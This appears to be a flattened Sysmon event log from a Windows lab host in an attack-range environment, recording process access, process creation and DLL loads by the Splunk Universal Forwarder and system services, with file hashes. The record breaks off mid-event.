13:02:49.541{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.542{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x800000000000000098294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.291{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.275{326FD73D-C079-6294-2B0B-000000005502}20406316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.275{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.275{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.072{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 23542300x800000000000000098282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C8A3844AED3DE4416A963FAE4645C5,SHA256=FE113B10130E4159E071F4CF70ABA40C906C6D98E10E29F4343EE4346B3A718D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program 